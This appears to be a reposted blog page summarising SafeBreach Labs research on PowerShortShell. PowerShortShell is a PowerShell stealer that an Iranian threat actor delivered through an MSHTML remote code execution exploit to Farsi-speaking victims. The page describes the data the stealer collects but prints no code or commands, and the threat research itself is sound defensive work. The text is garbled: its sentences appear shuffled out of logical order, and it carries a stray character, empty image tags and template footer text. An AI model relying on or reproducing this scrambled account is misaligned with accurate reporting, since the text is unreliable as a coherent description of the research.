![]() Based on the Microsoft Word document content – which blames Iran’s leader for the “Corona massacre” and the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime. ![]() The reason we chose this name is due to the fact that the stealer is a PowerShell script, short with powerful collection capabilities – in only \~150 lines, it provides the adversary a lot of critical information including screen captures, telegram files, document collection, and extensive data about the victim’s environment.Īlmost half of the victims are located in the United States. SafeBreach Labs analyzed the full attack chain, discovered new phishing attacks which started in July this year and achieved the last and most interesting piece of the puzzle – the PowerShell Stealer code – which we named PowerShortShell. However, the PowerShell Stealer hash/code was not published and was not included in VirusTotal or other public malware repositories. The threat actor initiated the attack in mid-September 2021, and it was first reported by ShadowChasing on Twitter. SafeBreach Labs discovered a new Iranian threat actor using a Microsoft MSHTML Remote Code Execution (RCE) exploit for infecting Farsi-speaking victims with a new PowerShell stealer. ![]() Author: Tomer Bar, Director of Security Research, SafeBreach
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |